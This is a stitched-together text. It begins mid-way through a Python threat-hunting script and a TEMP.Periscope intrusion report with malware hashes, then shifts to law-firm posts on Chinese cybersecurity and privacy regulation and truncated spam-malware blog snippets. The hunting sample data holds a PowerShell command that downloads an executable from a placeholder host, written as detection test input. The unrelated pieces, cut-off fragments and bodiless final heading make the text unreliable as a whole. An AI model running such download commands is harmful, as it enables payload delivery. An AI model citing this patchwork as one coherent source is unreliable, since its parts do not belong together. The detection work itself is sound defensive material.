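     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "C:\\Perflogs\\mt.exe"},
    {"RecordId": "r4", "EventID": 11, "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk"},
    {"RecordId": "r5", "EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "wscript.exe C:\\Users\\alice\\AppData\\Roaming\\x.js"},
    {"RecordId": "r6", "EventID": 20, "Name": "Updater", "Type": "Command Line",
     "Destination": "wscript.exe C:\\Windows\\Debug\\x.js"},
    {"RecordId": "r7", "EventID": 1,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.exe','C:\\Windows\\Debug\\a.exe')"},
    # Benign records: an interactive PowerShell listing and a routine temp-file write.
    {"RecordId": "r8", "EventID": 1,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"RecordId": "r9", "EventID": 11, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetFilename": "C:\\Windows\\Temp\\tmp1.dat"},
]

if __name__ == "__main__":
    for rule, rid in hunt(SAMPLE_EVENTS):
        print(f"{rid}: {rule}")
```

The rules are deliberately narrow; in production each would be tuned against the environment's own baseline of bitsadmin, PowerShell and WMI usage before alerting.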

Implications

The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.

Indicators

File | Hash | Description
x.js | 3fefa55daeb167931975c22df3eca20a | HOMEFRY, a 64-bit Windows password dumper/cracker
mt.exe | 40528e368d323db0ac5c3f5e1efe4889 | MURKYTOP, a command-line reconnaissance tool
com4.js | a68bf5fce22e7f1d6f999b7a580ae477 | AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators

File | Hash | Description
green.ddd | 3eb6f85ac046a96204096ab65bbd3e7e | AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages
BGij | 6e843ef4856336fe3ef4ed27a4c792b1 | Beacon, a commercially available backdoor
msresamn.ttf | a9e7539c1ebe857bae6efceefaa9dd16 | PHOTO, also reported as Derusbi
1024-aa6a121f98330df2edee6c4391df21ff43a33604 | bd9e4c82bf12c4e7a58221fc52fed705 | BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

China Releases National Standard on Personal Information Security

On January 25, 2018, the Standardization Administration of China published the full text of the Information Security Technology – Personal Information Security Specification (the “Specification”). The Specification will come into effect on May 1, 2018. The Specification is voluntary, but could become influential within China because it establishes benchmarks for the processing of personal information by a wide variety of entities and organizations. In effect, the Specification constitutes a best practices guide for the collection, retention, use, sharing and transfer of personal information, and for the handling of related information security incidents.

The Specification divides personal information into two categories: personal information and sensitive personal information. “Sensitive personal information” includes personal information such as financial information, identifying information (such as an ID card, social insurance card, passport or driver’s license) and biological identifying information. The Specification provides specific requirements for the collection and use of sensitive personal information, as well as a sample functional interface with a data subject which could be incorporated by an enterprise in its products or services for the collection of sensitive personal information. The sample functional interface is a template for an interactive web page or software that is designed in accordance with the Specification, shows information such as the purpose, scope and transfer of personal information, and contains a checkbox to obtain consent.

The Specification reiterates the applicability of the principles of legitimacy and minimization, and the obligation to obtain the consent of a data subject, when collecting personal information, as well as the requirement to formulate and publish a privacy policy. These appear in earlier privacy-related laws and regulations, such as the Cybersecurity Law. In addition, the Specification provides several exceptions to the consent requirement, including when the collection and use of personal information is (1) directly related to national security, public security, a matter of material public interest, the investigation or trial of a crime or the enforcement of a judgement, or (2) requested by a data subject and is necessary for the execution and performance of a contract. The Specification also includes a template privacy policy. When collecting personal information indirectly from a third party (rather than directly from the data subject), an entity must require the party providing the information to explain the source by which the personal information was originally obtained, and to check whether that party obtained the consent of the data subject for the sharing, transfer or disclosure of the personal information.

According to the Specification, personal information must be retained for only the minimum extent necessary, and must be deleted or anonymized after the expiration of the retention period. Encryption measures must be adopted whenever sensitive personal information is retained. When a personal information controller ceases to provide a product or service, it must inform the relevant data subjects and must delete or anonymize all personal information retained in relation to the data subjects.

When an enterprise uses personal information, it must adopt controls on access and restrictions on the display of the information. The use of personal information must not go beyond the purpose stated when collecting it. Personal data subjects have the right to request correction, deletion and copies of personal information that pertains to them, as well as the right to withdraw their consent to the collection and use of the personal information. An enterprise must respond to the request of a data subject for correction, deletion or copying once it has verified his or her identity.

When an enterprise engages a third party to process personal information, it must conduct a security assessment to ensure that the processor possesses sufficient security capabilities. The enterprise must also require the third party to safeguard the personal information, and must also supervise the third party’s processing of the personal information. If an enterprise needs to share or transfer personal information, it must conduct a security assessment and adopt security measures, inform the data subjects of the purpose of the sharing or transfer and of the categories of recipients, and obtain the consent of the data subjects.

An enterprise must formulate a contingency plan for security incidents that involve personal information and conduct emergency drills at least once a year. In the event of an actual data breach incident, the enterprise must inform the affected data subjects by email, letter, telephone or other reasonable and efficient method. The notice must include information such as the substance of the incident and its impact, remedial measures that have been taken or will be taken, suggestions for the data subjects on how to reduce risks, remedial measures made available to data subjects, and the responsible person and his or her contact information.

The Specification requires entities to clarify which of their departments and staff would be responsible for the protection of personal information, and to establish a system to evaluate impacts on the security of personal information. Enterprises must also implement staff training and audit the security measures which they have adopted to protect personal information.

China Publishes Second Draft of E-Commerce Law for Comment

On November 7, 2017, the Standing Committee of the National People’s Congress of China published the second draft of the E-commerce Law (the “Second Draft”) and is allowing the general public an opportunity to comment through November 26, 2017.

The Second Draft applies to e-commerce activities within the territory of China. One significant change from the first draft is that the Second Draft omits the first draft’s definition of “personal information” of e-commerce users and the detailed requirements concerning the collection and use of personal information of such users. Instead, the Second Draft would require that, when collecting and using personal information of users, e-commerce operators comply with rules established under the Cybersecurity Law of China and other relevant laws and regulations.

Pursuant to the Second Draft, e-commerce operators would be required to provide users with clear methods and procedures for accessing the users’ information, making corrections or deleting the users’ information, or closing user accounts. Also, e-commerce operators would be restricted from imposing unreasonable conditions on users when they request access, correction or deletion of information, or closure of their accounts.

The Second Draft also would require operators of e-commerce platforms to adopt measures, technological and otherwise, to protect network security, and to adopt contingency plans for cybersecurity incidents. In the event of an actual cybersecurity incident, an operator of an e-commerce platform would be required to immediately put its contingency plan into action, take remedial measures and report the incident to the relevant authorities.

China Releases Four Draft Guidelines in Relation to Cybersecurity Law

On August 31, 2017, the National Information Security Standardization Technical Committee of China published four draft voluntary guidelines (“Draft Guidelines”) in relation to the Cybersecurity Law of China. The Draft Guidelines are open for comment from the general public until October 13, 2017.

Information Security Technology – Guidelines for Cross-Border Transfer Security Assessment: Compared with the first draft published in May, the second Draft Guidelines add new definitions of certain terms, such as “domestic operations,” “cross-border data transfer” and “assessment by competent authorities.” According to these Draft Guidelines, a network operator that is not registered in China would still be deemed to be conducting “domestic operations” if it conducts business within the territory of China, or provides products or services within the territory of China. Even if the data collected by a network operator is not retained outside of China, there could still be a cross-border transfer of the data if overseas entities, institutions or individuals are able to access the data remotely. These Draft Guidelines provide separate assessment procedures for self-assessments and assessments by competent authorities. A security assessment would focus on the purpose of the proposed cross-border transfer, with reference to the legality, appropriateness and necessity of the transfer, and the security risks involved in the transfer.

Information Security Technology – General Security Requirements for Network Products and Services: This document provides both general security requirements and enhanced security requirements applicable to network products and services sold or provided within the territory of China. According to these Draft Guidelines, “network products” include computers, information terminals, basic software, system software and the like. “Network services” include cloud computing services, data processing and storage services, network communication services and the like. General security requirements under this draft include malware prevention, vulnerability management, security operating maintenance and protection of user information. Enhanced security requirements include identity verification, access controls, security audits, communication protection and certain security protection requirements.

Information Security Technology – Guide to Security Inspection and Evaluation of Critical Information Infrastructure: This document provides the procedures and substance of security inspections and evaluations of critical information infrastructure. According to these Draft Guidelines, the inspection and evaluation is divided into three methods, which include compliance inspection, technical inspection and analysis and evaluation. The key steps in a security inspection and evaluation include preparation, implementation of compliance inspection, technical inspection and analysis and evaluation, risk control and preparation of a report.

Information Security Technology – Systems of Indicators for the Assurance of the Security of Critical Information Infrastructure: This document establishes and defines indicators to be used as focal points in evaluating the security of critical information infrastructure. The indicators discussed under these Draft Guidelines include operational capacity indicator, security indicator, security monitoring indicator, emergency response indicator, etc.

China Releases Draft Guidelines on De-Identification of Personal Information

Recently, the National Information Security Standardization Technical Committee of China published a draft document entitled Information Security Technology – Guidelines for De-Identifying Personal Information (the “Draft Guidelines”). The Draft Guidelines are open for comment from the general public until October 9, 2017.

The Draft Guidelines provide a voluntary technical specification, the purpose of which is to provide guidance to data processors on the de-identification of personal information. The Draft Guidelines specify the purposes, principles and procedures for the de-identification of personal information. They also provide an introduction to common de-identification technologies, such as sampling, aggregation and cryptographic tools, and an introduction to common de-identification models, such as the K-anonymity model and the differential privacy model.

According to the Draft Guidelines, the de-identification of personal information should follow these principles:

  • the de-identification must be in compliance with laws and regulations in relation to the protection of personal information;
  • the protection of personal information has priority over the use of the de-identified data;
  • measures should be adopted that reflect both technical and management approaches when conducting a de-identification of personal information;
  • software tools should be used; and
  • after the de-identification of personal information has been completed, regular reassessments should be adopted.

The Draft Guidelines also provide key steps for the de-identification of personal information, including isolating the identifiers using methods such as manual analysis, choosing models for the de-identification of personal information, verifying the security and usefulness of the data after its de-identification, and supervising the process of de-identification.

Multiple badness on metoristrontgui.info / 119.28.100.249

Two massive fake "Bill" spam runs seem to be under way, one claiming to be from BT and the other being more generic.

Subject: New BT Bill
From: "BT Business" [btbusiness@bttconnect.com]
Date: Thu, August 24, 2017 6:08 pm
Priority: Normal

From BT
New BT Bill
Your bill amount is: $106.84
This doesn't include any amounts brought forward from any other bills.
We've put your latest

Malware spam: "Voice Message Attached from 0xxxxxxxxxxx – name unavailable"

This fake voice mail message leads to malware. It comes in two slightly different versions, one with a RAR file download and the other with a ZIP.

Subject: Voice Message Attached from 001396445685 - name unavailable
From: "Voice Message"
Date: Wed, August 23, 2017 10:22 am

Time: Wed, 23 Aug 2017 14:52:12 +0530
Download

Cerber spam: "please print", "images etc"

I only have a couple of samples of this spam, but I suspect it comes in many different flavours.

Subject: images
From: "Sophia Passmore" [Sophia5555@victimdomain.tld]
Date: Fri, May 12, 2017 7:18 pm
--
*Sophia Passmore*

Subject: please print
From: "Roberta Pethick" [Roberta5555@victimdomain.tld]
Date: Fri, May 12, 2017 7:18 pm
--
*Roberta Pethick*

In these two

Hunton Privacy Team Publishes Several Chapters in International Comparative Legal Guide to Data Protection

Recently, the fourth edition of the book, The International Comparative Legal Guide to: Data Protection 2017, was published by the Global Legal Group. Hunton & Williams’ Global Privacy and Cybersecurity lawyers prepared several chapters in the guide, including the opening chapter on “All Change for Data Protection: The European Data Protection Regulation,” co-authored by London partner Bridget Treacy and associate Anita Bapat. Several other global privacy and cybersecurity team members also prepared chapters in the guide, including David Dumont (Belgium), Claire François (France), Judy Li (China), Manuel E. Maisog (China), Wim Nauwelaerts (Belgium), Anna Pateraki (Germany), Aaron P. Simpson (United States), Adam Smith (United Kingdom) and Jenna Rode (United States).

The guide provides corporate counsel and international practitioners with a comprehensive worldwide legal analysis of the laws and regulations relating to data protection. Aaron Simpson, managing partner of the firm’s London office, and Anita Bapat, senior associate in London, served as the contributing editors of the guide.

View the relevant chapters.

First Enforcement Actions Brought Pursuant to China’s Cybersecurity Law

In the wake of China’s Cybersecurity Law going into effect on June 1, 2017, local authorities in Shantou and Chongqing have brought enforcement actions against information technology companies for violations of the Cybersecurity Law. These are, reportedly, the first enforcement actions brought pursuant to the Cybersecurity Law.

Recently, Chongqing’s municipal Public Security Bureau’s cybersecurity team identified a violation of the Cybersecurity Law during a routine inspection. A technology development company failed, as required under the Cybersecurity Law, to retain web logs relating to its users’ logins when providing internet data center services. In response, the public security authority issued a warning and an order to correct the issue within 15 days, with a follow-up inspection to take place after the rectification. In another enforcement action taken by Shantou’s municipal Public Security Bureau’s cybersecurity team in July, an information technology company in Shantou, Guangdong Province, was ordered to correct a violation of the Cybersecurity Law.

Though reportedly the first enforcement actions brought pursuant to the new Cybersecurity Law, these amounted to only minor actions. They involved only warnings and orders to correct the issues; no fines or criminal penalties were imposed. Accordingly, these enforcement actions likely do not provide much insight into how the Cybersecurity Law will be enforced moving forward. These actions do, however, indicate that enforcement authorities, such as public security agencies and the cyberspace administration agency, have started to consider their roles in enforcing the Cybersecurity Law. More enforcement actions could be expected in future.

China Publishes Draft Regulations on Protecting the Security of Key Information Infrastructure

This post has been updated. 

On July 10, 2017, the Cyberspace Administration of China published a new draft of its Regulations on Protecting the Security of Key Information Infrastructure (the “Draft Regulations”), and invited comment from the general public. The Cybersecurity Law of China establishes a new category of information infrastructure, called “key [or critical] information infrastructure,” and imposes certain cybersecurity obligations on enterprises that operate such infrastructure. The Draft Regulations will remain open for comment through August 10, 2017.

The Draft Regulations provide further details on the scope of what will constitute “key information infrastructure.” According to the Draft Regulations, this may include network facilities and information systems operated and managed by (1) government agencies and entities in the energy, finance, transportation, water conservation, health care, education, social insurance, environmental protection and public utilities sectors; (2) information networks, such as telecommunications networks, broadcast television networks and the Internet, and entities providing cloud computing, big data and other large-scale public information network services; (3) research and manufacturing entities in industry sectors such as science and technology for national defense, large equipment manufacturing and the chemical industry and food and drug sectors; and (4) news organizations, such as broadcasting stations, television stations and news agencies. To be counted as “key information infrastructure,” however, the infrastructure must still meet the criterion that severe endangerment of national security, the national economy and the people’s livelihood and the public interest would result if the infrastructure suffers destruction, loss of functionality or leakage of data. The Cyberspace Administration of China will work together with relevant government agencies to formulate materials for the identification of “key information infrastructure” in their respective industry sectors and fields.

The Draft Regulations reiterate the cybersecurity compliance obligations originally imposed under the Cybersecurity Law, such as obligations to formulate internal security management systems and operating protocols; to adopt technological measures to protect against computer viruses and attacks and intrusions on networks; to monitor and record network operations and cybersecurity incidents; and to adopt security measures such as data classification, back-up and encryption of important data. At the same time, the Draft Regulations impose further cybersecurity obligations on operators of key information infrastructure, including obligations to: (1) designate a specific cybersecurity administrative department and persons responsible for cybersecurity, and conduct background reviews of these responsible persons; (2) conduct cybersecurity education, technology training and evaluation of the skills of relevant staff on a regular basis; (3) implement disaster recovery backup for important systems and databases, and adopt remedial measures to promptly address security risks such as system vulnerabilities; and (4) establish contingency plans for cybersecurity incidents and conduct regular rehearsals of these plans.

According to the Draft Regulations, operators of key information infrastructure should establish a system to inspect their key information infrastructure and evaluate its security aspects and possible risks. They may conduct this inspection and evaluation on their own behalf, or engage third-party cybersecurity service providers. They must conduct this inspection and evaluation at least once a year.

The Draft Regulations reiterate the original data localization requirements on the operators of key information infrastructure under the Cybersecurity Law, as well as related requirements under the Measures for Security Reviews of Network Products and Services. The Draft Regulations also require that the operation and maintenance of key information infrastructure should be performed within the territory of China. If overseas long-distance maintenance of key information infrastructure is truly necessary for business reasons, the operator should report in advance to both the relevant government agency that has the authority over the industry sector and the public security department.

View our English translation of the Draft Regulations.

China Releases Draft Guidelines on Cross-Border Data Transfers Pursuant to the Cybersecurity Law

On May 27, 2017, the National Information Security Standardization Technical Committee of China published draft guidelines on cross-border transfers pursuant to the new Cybersecurity Law, entitled Information Security Technology – Guidelines for Data Cross-Border Transfer Security Assessment (the “Draft Guidelines”). The earlier draft, Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data (the “Draft Measures”), requires network operators to conduct “security assessments” when they propose to transfer personal information and “important information” to places outside of China. These “security assessments” are essentially audits of the cybersecurity circumstances surrounding the proposed transfer that are intended to produce an assessment of the risk involved. If the assessment indicates that the risk is too high, the transfer must be terminated.

The Draft Guidelines, once finalized, are intended to establish norms for working requirements, methodology, content and the determination of conclusions for these “security assessments.” They recommend particular content for consideration during “security assessments,” such as the volume of information to be transferred, the political and legal environment in the place where the data recipient is located, and the security safeguard capabilities of both the transferor and the data recipient. At this time, the following observations can be made:

  • Very generally speaking, the Draft Measures appear to take a risk-based approach, meaning that an assessment of the overall risks associated with a cross-border transfer, and the likely outcomes thereof, rather than a formalistic “check the box” compliance approach, should be used to determine whether the transfer should proceed.
  • The Draft Guidelines appear intended, once finalized, to be a voluntary rather than compulsory document.
  • The “security assessments” would focus on two overall inquiries: (1) the legality and appropriateness of the proposed cross-border transfer, and (2) the controllability of the risks involved.
  • In addition to personal information, the Draft Measures would also impose restrictions on the cross-border transfer of “important information.” The Draft Measures define this term broadly as “information which is very closely related to national security, economic development and the societal and public interests.” The Draft Guidelines provide some specific possible examples of what might constitute “important information.”
  • The Draft Guidelines would introduce into the Cybersecurity Law’s implementation framework the concept of “sensitive personal information,” as well as the possibility of desensitizing this information using processing that removes or reduces the sensitive elements in the data.

The Draft Guidelines’ content and approach may change by the time they are finalized. The Draft Guidelines are open to comment from the general public until June 26, 2017.

Cybersecurity Law Goes Into Effect in China

On June 1, 2017, the new Cybersecurity Law went into effect in China. This post takes stock of (1) which measures have been passed so far, (2) which ones go into effect on June 1 and (3) which ones are in progress but have yet to be promulgated.

A draft implementing regulation and a draft technical guidance document on the treatment of cross-border transfers of personal information have been circulated, but at this time only the Cybersecurity Law itself and a relatively specific regulation (applicable to certain products and services used in network and information systems in relation to national security) have been finalized. As such, only the provisions of the Cybersecurity Law itself and this relatively specific regulation went into effect on June 1.

On June 1, 2017, the following obligations (among others) became legally mandatory for “network operators” and “providers of network products and services”:

  • personal information protection obligations, including notice and consent requirements;
  • for “network operators,” obligations to implement cybersecurity practices, such as designating personnel to be responsible for cybersecurity, and adopting contingency plans for cybersecurity incidents; and
  • for “providers of network products and services,” obligations to provide security maintenance for their products or services and to adopt remedial measures in case of safety defects in their products or services.

Penalties for violating the Cybersecurity Law vary according to the specific violation, but typically include (1) a warning, an order to correct the violation, confiscation of illegal proceeds and/or a fine (typically ranging up to RMB 1 million); (2) personal fines for directly responsible persons (typically ranging up to RMB 100,000); and (3) in particularly serious circumstances, suspensions or shutdowns of offending websites and businesses, including revocations of operating permits and business licenses.

Final versions of the draft implementing regulation and the draft technical guidance document on the treatment of cross-border transfers of personal information are forthcoming. When issued, they are expected to finalize and clarify the following prospective obligations:

  • restrictions on cross-border transfers of personal information (and “important information”), including a notice and consent obligation specific to cross-border transfers; and
  • procedures and standards for “security assessments,” which validate the continuation of cross-border transfers of personal information and “important information.”

The draft version of the implementing regulation on the treatment of cross-border transfers of personal information contains a grace period, under which “network operators” would not be required to comply with the cross-border transfer requirements until December 31, 2018. The final draft likely will contain a similar grace period.

China Releases Revised Draft on Measures for Implementation of the New Cybersecurity Law

On May 19, 2017, the Cyberspace Administration of China (“CAC”) issued a revised draft (the “Revised Draft”) of its Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data. The original draft was issued in April 2017. Like the original draft, the Revised Draft does not have the force of law; it does, however, indicate how the CAC’s views on the Cybersecurity Law have evolved since the publication of the original draft. The Revised Draft was issued after the CAC received comments on the original draft from numerous parties.

The principal issues and challenges presented in the original draft remain largely the same in the Revised Draft, although certain issues have been clarified. Below are some key issues addressed in the Revised Draft:

  • The Revised Draft maintains the original draft’s restrictions on cross-border transfers of personal data, and applies the restrictions to “network operators.” Prior to conducting cross-border transfers, “network operators” are required to notify data subjects and obtain their consent.
  • Data subject consent to a cross-border transfer will not be required during emergencies (i.e., when the life or property of a data subject is in danger).
  • The data subject’s consent can be established in implied form by way of an affirmative act by the data subject.
  • The Revised Draft maintains the original draft’s requirement to conduct a “security assessment” on all cross-border transfers of personal data. Large-scale transfers, or transfers involving relatively sensitive information, must be conducted before a regulatory authority. The original draft defined large-scale transfers as those involving personal data of more than 500,000 individuals or involving files larger than 1,000 GB; the Revised Draft’s definition no longer includes files larger than 1,000 GB.
  • The definition of “network operator” remains very broad under the Revised Draft, and may apply to practically any material enterprise.
  • The Revised Draft is stated to go into effect together with the Cybersecurity Law itself on June 1, 2017. However, the Revised Draft also contains a grace period for the cross-border transfer restriction. Under that grace period, “network operators” will only have to comply with the requirements on cross-border transfers beginning on December 31, 2018.

Chinese Hackers Fined for Hack of New York Law Firms

On May 5, 2017, the U.S. District Court for the Southern District of New York entered a default judgment in favor of the SEC against three Chinese defendants accused of hacking into the nonpublic networks of two New York-headquartered law firms and stealing confidential information regarding several publicly traded companies engaged in mergers and acquisitions. The defendants allegedly profited illegally by trading the stolen nonpublic information. After the defendants failed to answer the SEC’s complaint, the court entered a default judgment against them, imposing a fine of approximately $8.9 million against the defendants (three times the profits they gained by the unlawful trading, the maximum penalty allowable under the relevant section of the Securities Exchange Act of 1934).

China Publishes Final Measures for Security Reviews of Network Products and Services

On May 2, 2017, the Cyberspace Administration of China published the final version of the Measures for the Security Review of Network Products and Services (for trial implementation) (the “Measures”), after having published a draft for public comment in February. Pursuant to the Cybersecurity Law of China (the “Cybersecurity Law”), if an operator of key information infrastructure purchases a network product or service that may affect national security, a security review of that product or service is required. The Measures provide detailed information about how these security reviews will actually be implemented. The Measures will come into effect on June 1, 2017, together with the Cybersecurity Law. The Measures should not be confused with the draft Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data, which were published on April 11, 2017, and remain open for public comment.

Pursuant to the Measures, critical network products and services used in network and information systems relating to national security are subject to a network security review. Any network product or service purchased by operators of key information infrastructure will also be subject to a network security review, if such product or service might affect national security.

The Measures require that the security assessments focus on verifying that the products or services are “secure and controllable.” The Measures do not provide the precise requirements for finding that a product or service is “secure and controllable,” but indicate that the process for determining whether a product or service is “secure and controllable” will take the form of a risk assessment, which will focus on the following risks: (1) the risk in the product or service itself, and the risk that the product or service may be illegally controlled, interfered with or suspended; (2) the supply chain risks arising during the manufacturing, testing, delivery and technical support of the product or service; (3) the risk that the provider of the product or service may use it to illegally collect, store, process or use its users’ personal information; (4) the risk that the provider of the product or service may jeopardize cybersecurity or infringe upon the interests of users, by taking advantage of their reliance on the product or service; and (5) any other risks that may jeopardize national security.

The Cyberspace Administration of China will establish a network security review commission which will cooperate with experts and third-party institutions to evaluate the foregoing risks.

China Publishes Draft Measures for Security Assessments of Data Transfers

The Cybersecurity Law of China, which was passed in November of 2016, introduced a data localization requirement requiring “operators of key information infrastructure” to retain, within China, critical data and personal information which they collect or generate in the course of operating their business in China. If an entity has a genuine need resulting from a business necessity to transmit critical data or personal information to a destination outside of China, it can do so provided it undergoes a “security assessment.”

On April 11, 2017, the Cyberspace Administration of China published a draft of its proposed Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data (the “Draft”). The Draft provides further guidance on how the security assessments might be carried out. The general public may comment on the Draft until May 11, 2017. At this point, the Draft has only been published for comment and does not constitute a final regulation. However, it represents a real possibility of what the final regulation could require.

The Draft would extend the data localization requirement from “operators of key information infrastructure” to all “network operators.” The definition of “network operator” under the Draft remains consistent with the definition given under the Cybersecurity Law, which refers to an owner or an administrator of a computerized information network system, or a network service provider. This means that all “network operators” will also be required to store, within the territory of China, personal information and critical data which they collect or generate in the course of operating their business in China, and to undergo a security assessment if they have a business need to transmit data outside of China.

The Draft has divided the security assessment into two types, self-assessments and assessments conducted by the competent authority. In general, a “network operator” has to conduct a self-assessment before transmitting critical data or personal information abroad, and will remain responsible for the result of its assessment. However, a security assessment must be submitted to and conducted by the competent authority under the following circumstances: (1) the outbound data transfer involves the personal information of over 500,000 individuals; (2) the data size is over 1,000 GB; (3) the transfer involves data in relation to nuclear facilities, chemistry and biology, national defense and the military, population health, megaprojects, the marine environment or sensitive geographic information; (4) the transfer involves data relating to information about the cybersecurity of key information infrastructure, such as system vulnerabilities and security protection; (5) the outbound transfer of personal information and critical data is conducted by an operator of key information infrastructure; or (6) the outbound data transfer may affect the national security or the public interest.

“Personal information” is already defined in the Cybersecurity Law itself as information that is recorded by electronic or other methods and that can, on its own or in combination with other information, distinguish the identity of a natural person. “Critical data” is defined in the Draft as data which is very closely related to national security, economic development and the social and public interests, but the concrete scope is to be further elaborated upon in relevant national standards and separate guidance documents.

Under the Draft, a security assessment would focus on the following factors: (1) the necessity of the outbound transfer; (2) the quantity, scope, type and sensitivity of the personal information and critical data to be transferred; (3) the security measures and capabilities of the data recipient, as well as the cybersecurity environment of the nation where the data recipient is resident; (4) the risk of leakage, damage or abuse of the data after the outbound transfer; and (5) possible risks to national security, public interests and individuals’ legal rights that are involved in the outbound data transfer and data aggregation.

When transferring personal information, network operators are required to expressly explain to the data subject the purpose, scope, content, recipient and the nation where the recipient is resident, and obtain the consent of the data subject. An outbound data transfer is prohibited without the consent of a data subject, or when the transfer may infringe upon the interests of the individual. Outbound transfers of a minor’s personal information must be consented to by the minor’s guardian.

An outbound data transfer will also be prohibited if the transfer would bring risks to the security of the national political system, economy, science and technology or national defense, or if the transfer could affect national security or jeopardize the public interest.

China Publishes Draft Measures for Security Review of Network Products and Services

On February 4, 2017, the Cyberspace Administration of China published a draft of its proposed Measures for the Security Review of Network Products and Services (the “Draft”). Under the Cybersecurity Law of China, if an operator of key information infrastructure purchases network products and services that may affect national security, a security review is required. The Draft provides further hints of how these security reviews may actually be carried out, and is open for comment until March 4, 2017.

According to the Draft, any critical network products and services used in information systems or purchased by operators of key information infrastructure that may affect national security and the public interest are subject to a network security review.

The Draft would establish a potentially significant standard that would be commonly applied in security assessments performed under the Cybersecurity Law. These security assessments would focus on verifying that products or services are “secure and controllable.” The concept of “security and controllability” has appeared before, both in the State Security Law of China and in guidelines for the banking and telecommunications sectors, but here it is being applied in the context of the new Cybersecurity Law.

It remains to be seen how this term would be interpreted in the context of the new Cybersecurity Law. The exact requirements to determine if a product or service is “secure and controllable” are still not provided in the Draft, and even after being established, may evolve over time. However, under the Draft, the process of determining whether a product or service is “secure and controllable” would take the form of a risk assessment, under which the following risks would be principally analyzed: (1) the risk that the product or service may be illegally controlled, interfered with or suspended, (2) the risks arising during development, delivery and technical support of the product or service, (3) the risk that the provider of the product or service may use it to illegally collect, store, process or use the personal information of its users, (4) the risk that the provider of the product or service may engage in unfair competition or infringe upon the interests of users, by taking advantage of their reliance on the product or service and (5) any other risks that may jeopardize national security or the public interest.

The Cyberspace Administration of China will establish a network security review commission, which will cooperate with third-party institutions to evaluate these risks.

South Korea Seeks to Join APEC Cross-Border Privacy Rules

On January 17, 2017, the International Trade Administration (“ITA”) announced that South Korea formally submitted its intent to join the APEC Cross-Border Privacy Rules (“CBPR”) system. South Korea would be the fifth APEC economy to join the system, joining the United States, Mexico, Canada and Japan.

The APEC CBPR system is a regional, multilateral, cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. According to the ITA, there is growing international recognition that the CBPR system is “a mechanism to build confidence for consumers, businesses, and regulators in regional privacy practices,” as well as “a template for creating a global solution to data transfer restrictions.”

South Korea’s statement of intent to join the CBPR system follows on the heels of Chinese Taipei’s recent announcement that it intends to join the system in the near future, as well as recent indications that other APEC economies are considering or working towards joining the system.

Draft of E-Commerce Law Published for Comment in China

Last month, the Standing Committee of the National People’s Congress of China published a full draft of the E-commerce Law (the “Draft”) and is giving the general public an opportunity to comment on the draft through January 26, 2017.

The Draft applies to (1) e-commerce activities within China or (2) e-commerce activities involving either domestic enterprises that operate an e-commerce business or customers located in China. In particular, the Draft provides specific protections for “personal information” of e-commerce users, defined as information which can be used, separately or in combination with other information, to identify a specific user. The Draft provides specific examples, including the user’s name, identity certificate number, address, contact information, location, bank card information, transaction records and payment records, as well as express logistics records.

The Draft reiterates that enterprises operating an e-commerce business (“e-commerce enterprises”), which include e-commerce third-party platforms and e-commerce operators, are required to (1) follow the principles of legitimacy, rightfulness and necessity, (2) publish their rules on the collection, processing and use of personal information in advance and (3) obtain the consent of their users to those rules. The Draft does not provide any guidance on the form or manner in which consent must be obtained. The Draft also prohibits e-commerce enterprises from forcing users to consent to their collection, processing and use of personal information by threatening to cease the provision of services.

The processing and use of personal information by e-commerce enterprises must comply with the enterprise’s published rules on processing as agreed upon with its users. In addition, when amending its rules on information processing, an e-commerce enterprise must again obtain the consent of the users. If the users disagree with the amendments, the enterprise is required to provide appropriate relief. In instances where the enterprise proposes changes to its rules directed at the purpose, method or scope of the processing previously agreed upon with its users, the enterprise is required to inform the user and obtain the user’s express consent.

Before they may exchange and share data and information related to e-commerce, e-commerce enterprises are first required to irreversibly de-personalize the data and information in such a way that it can no longer be used to identify a specific individual (or an associated computer terminal). Additionally, in instances where the processing or use of personal information by an e-commerce enterprise might infringe upon the legitimate rights and interests of a user, the user has the right to request that the e-commerce operating entity cease the infringement. Further, upon expiration of a statutory or agreed-upon retention period, an e-commerce enterprise is required to cease its processing and use of relevant personal information, or delete or destroy such information.

According to the Draft, users also have the right to access their personal information. After receiving an access request from a user, the enterprise must promptly provide the relevant information after verifying the user’s identity. Similarly, in cases where a user requests the correction of any incorrect information, the enterprise is required to make the changes in a timely manner.

The Draft also includes provisions governing data breaches. In the case of an occurrence or possibility of leakage, loss or damage of personal information, the e-commerce enterprise must immediately take remedial measures, promptly notify the users and submit a report to the relevant authorities.

The personal information protection requirements laid out in the Draft are generally consistent with those that appear in the new Chinese Cybersecurity Law, and in a number of prior regulations, including those governing internet information service providers. It is possible that this may be a pattern that is taking hold among rules governing the processing of personal information in China.

China Publishes Regulations Regarding Cloud Services for Public Comment

